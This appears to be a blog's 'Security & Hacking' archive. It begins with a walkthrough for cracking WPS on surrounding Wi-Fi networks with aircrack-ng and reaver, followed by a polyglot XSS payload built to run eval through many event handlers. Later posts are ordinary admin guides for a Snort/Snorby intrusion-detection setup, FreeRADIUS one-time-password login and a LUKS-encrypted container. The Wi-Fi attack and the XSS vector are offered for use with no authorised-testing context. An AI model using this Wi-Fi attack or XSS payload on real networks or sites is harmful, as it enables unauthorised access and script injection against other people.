Category Archives: Security

Security & Hacking

Howto hack WPS in wi-fi networks

Install reaver from here

Install air crack tools here

Or install it from standard repo, in ubuntu like

apt-get install aircrack-ng

for the next type
iwconfig

find your wireless interface, in ubuntu like wlan0.
ifconfig wlan0 up

Next command airmon-ng start wlan0. It will make new interface mon0 for monitor mode.

airodump-ng -i mon0
View all around wifi networks and choose one to hack. Remember channel and mac address.
CTRL+C

./reaver -b -c -vv

Then wait for program will find needed wpa key with pin.
It will be bruted not longer than 20 hours.

XSS vector

1
javascript:/*--></marquee></script></title></textarea></noscript></style></xmp>">[img=1]<img -/style=-=expression(/*’/-/*',/**/eval(name)//);width:100%;height:100%;position:absolute;behavior:url(#default#VML);-o-link:javascript:eval(title);-o-link-source:current name=alert(1) onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) background=javascript:eval(name)//>"

Snorby

Snort® is an open source network intrusion prevention and detection system (IDS/IPS)
Install it:
apt-get install snort-mysql
add to /etc/snort/snort.conf
output unified2: filename snort.log, limit 512

Snorby is a cute web-interface on «Ruby On Rails» and such beautiful and usable things like twitter-bootstrap
git clone http://github.com/Snorby/snorby.git
cd snorby
bundle install
set right mysql settings in config/database.yml
set right port, enviroment, pathes in config/snorby_config.yml
bundle exec rake snorby:setup
bundle exec rails server -e production

But how we can transfer data from snort's db to snorby's db ? Solution is Barnyard2
wget http://www.securixlive.com/download/barnyard2/barnyard2-1.9.tar.gz
tar -zxf barnyard2-1.9.tar.gz && cd barnyard2-1.9
./configure --with-mysql
sudo make && sudo make install
sudo mv /usr/local/etc/barnyard2.conf /etc/snort
add in the end of /etc/snort/barnyard2.conf:

output database: log, mysql, user=snorby password=snorbypass dbname=snorby host=mysqlhostname sensor_name=sensor1

Launch barnyard2:

1
2
/usr/local/bin/barnyard2 -c /etc/snort/barnyard2.conf -d /var/log/snort -f snort.log -w /etc/snort/bylog.waldo \
 -G /etc/snort/gen-msg.map -S /etc/snort/sid-msg.map -C /etc/snort/classification.config

That's all, have a good time =)

Freeradius: add motp authentication

aptitude install ksh gcc libpam0g-dev -y
wget http://motp.sourceforge.net/pam_mobile_otp-0.6.2.tgz
tar -zxf pam_mobile_otp-0.6.2.tgz
cd pam_mobile_otp-0.6.2
make && make install
wget http://downloads.sourceforge.net/project/pam-script/pam-script-1.1.5.tar.gz
cd pam-script
./configure && make && make install
wget http://motp.sourceforge.net/otpverify.sh
chmod +x otpverify.sh
wget http://motp.sourceforge.net/dictionary.motp
include this file to /etc/freeradius/dictionary
mkdir -p /var/motp/{cache,users}
chown -R freerad.freerad /var/motp
create file /etc/freeradius/modules/MOTP
MOTP {
wait = yes
program = «/path/to/otpverify.sh %{User-Name} %{User-Password} %{reply:Secret} %{reply:Pin} %{reply:Offset}»
input_pairs = request
output_pairs = reply
}

add to file /etc/freeradius/sited-enabled/default (or which do you use)
Auth-Type External {
         MOTP
}

edit /etc/freeradius/users
DEFAULT Auth-Type := External
  Fall-Through = Yes
yourlogin
 Secret = e37629f6d057dcc5,
 PIN = 1234,
 Offset = 0

/etc/init.d/freeradius restart

encrypted file-partition

How to create:

dd if=/dev/urandom of=/home/user/.hide bs=1GB count=10
dd if=/dev/urandom of=/home/user/.keyfile bs=1KB count=2
losetup /dev/loop1 /home/user/.hide
badblocks -s -w -t random -v /dev/loop1
cryptsetup luksFormat /dev/loop1 -d /home/user/.keyfile
cryptsetup luksOpen /dev/loop1 secret -d /home/user/.keyfile
mkfs.ext4 -j /dev/mapper/secret
e2fsck -f /dev/mapper/secret

How to mount:

losetup /dev/loop1 /home/user/.hide
cryptsetup luksOpen /dev/loop1 secret -d /home/user/.keyfile
mount /dev/mapper/secret /mnt/hide/

How to umount:

umount /mnt/hide
cryptsetup luksClose secret
losetup -d /dev/loop1